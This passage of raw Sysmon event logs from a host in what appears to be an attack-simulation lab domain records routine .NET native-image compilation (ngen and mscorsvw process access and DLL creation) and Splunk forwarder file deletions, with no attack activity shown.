\mscorsvc.dll+e032(wow64) 11241100x800000000000000021495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:22.874{4DB9351A-A212-60D3-6804-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b58-0\System.ComponentModel.DataAnnotations.dll2021-06-23 21:05:22.874 10341000x800000000000000021494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.781{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A212-60D3-6804-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.765{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A212-60D3-6804-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.765{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A212-60D3-6804-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.703{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A212-60D3-6704-00000000CF01}1328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.687{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A212-60D3-6704-00000000CF01}1328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.687{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A212-60D3-6704-00000000CF01}1328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:22.624{4DB9351A-A212-60D3-6604-00000000CF01}5696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1640-0\System.ComponentModel.Composition.Registration.dll2021-06-23 21:05:22.624 10341000x800000000000000021487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.515{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A212-60D3-6604-00000000CF01}5696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.484{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A212-60D3-6604-00000000CF01}5696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.484{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A212-60D3-6604-00000000CF01}5696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.437{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A212-60D3-6504-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.421{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A212-60D3-6504-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.421{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A212-60D3-6504-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:22.343{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1084-0\System.ComponentModel.Composition.dll2021-06-23 21:05:22.343 23542300x800000000000000021480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.156{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C34E63E11E6C05D5C46B3B8F0223D1B,SHA256=E82866221032EA0CA84479B177DCB50CD29A9CE9C48FEEBD2F13925E36A1B7C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.562{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A213-60D3-6C04-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.546{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A213-60D3-6C04-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.546{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A213-60D3-6C04-00000000CF01}2380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.437{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57CFD2DED817FFE2FD3BA4D55F934A1D,SHA256=7865FE757B0D73587D03859DCD7E6D0D9183E60B26B0925BB6BF21DEDA29E2AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.359{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A213-60D3-6B04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.328{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A213-60D3-6B04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.328{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A213-60D3-6B04-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:23.234{4DB9351A-A213-60D3-6A04-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e14-0\System.Data.DataSetExtensions.dll2021-06-23 21:05:23.234 23542300x800000000000000021502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.171{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB8098841F36C7109628D839FFD0CA11,SHA256=849F08D856C693133E052DF11094367C9A7FAC512BDAFCA1B77F9A30E7108B04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.109{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A213-60D3-6A04-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.093{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A213-60D3-6A04-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:23.093{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A213-60D3-6A04-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C